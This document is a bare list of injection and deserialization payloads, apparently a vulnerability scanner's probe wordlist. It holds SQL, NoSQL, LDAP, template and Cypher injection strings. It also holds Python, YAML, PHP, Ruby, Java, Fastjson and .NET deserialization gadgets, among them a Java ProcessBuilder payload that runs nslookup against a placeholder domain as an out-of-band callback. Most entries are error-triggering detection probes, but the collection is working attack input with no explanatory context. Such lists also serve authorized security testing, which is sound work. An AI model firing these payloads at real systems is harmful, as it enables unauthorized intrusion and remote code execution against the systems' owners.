'AND 1=CONVERT(int,@@version)--/*'OR 1=extractvalue(1,concat(0x7e,version()))--*/"OR CAST(version() AS int)--
${{<%[%'"}}%\
{"$gt":"","$ne":""}
*)(cn=*))(|(cn=*
<xsl:invalid/>
{"query":{"invalid_query_type":{}}}
' OR 1=1 RETURN 7*191 //
{"selector":{"$invalid_op":"test"}}
Y19fYnVpbHRpbl9fCmV2YWwKKFMnMS8wJwp0Ui4=
!!python/object/apply:builtins.eval ["1/0"]
{"py/reduce":[{"py/function":"builtins.eval"},{"py/tuple":["1/0"]}]}
{"rce":"_$$ND_FUNC$$_function(){throw new Error(1337)}()"}
!!invalid_tag_probe 1337
{"__js":"throw new Error(1337)"}
O:9999:"NonExist":0:{}
--- !ruby/object:NonExistentClass1337\ni: x
BAj/AAAA
cHN0MP///wQA
--- {{{invalid yaml 1337
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldA==
!!com.nonexistent.FakeClass1337 {}
["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",{"transletBytecodes":["yv66vg=="],"transletName":"a","outputProperties":{}}]
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vg=="],"_name":"a","_tfactory":{},"_outputProperties":{}}
<java.lang.ProcessBuilder><command><string>nslookup</string><string>{domain}</string></command></java.lang.ProcessBuilder>
<java version="1.8.0" class="java.beans.XMLDecoder"><object class="com.nonexistent.Fake1337"/></java>
AAEAAAD/////AQAAAAAAAAAEAQAAAA==
__VIEWSTATE=/wEPDwUKLTEyMzQ1Njc4OQ==
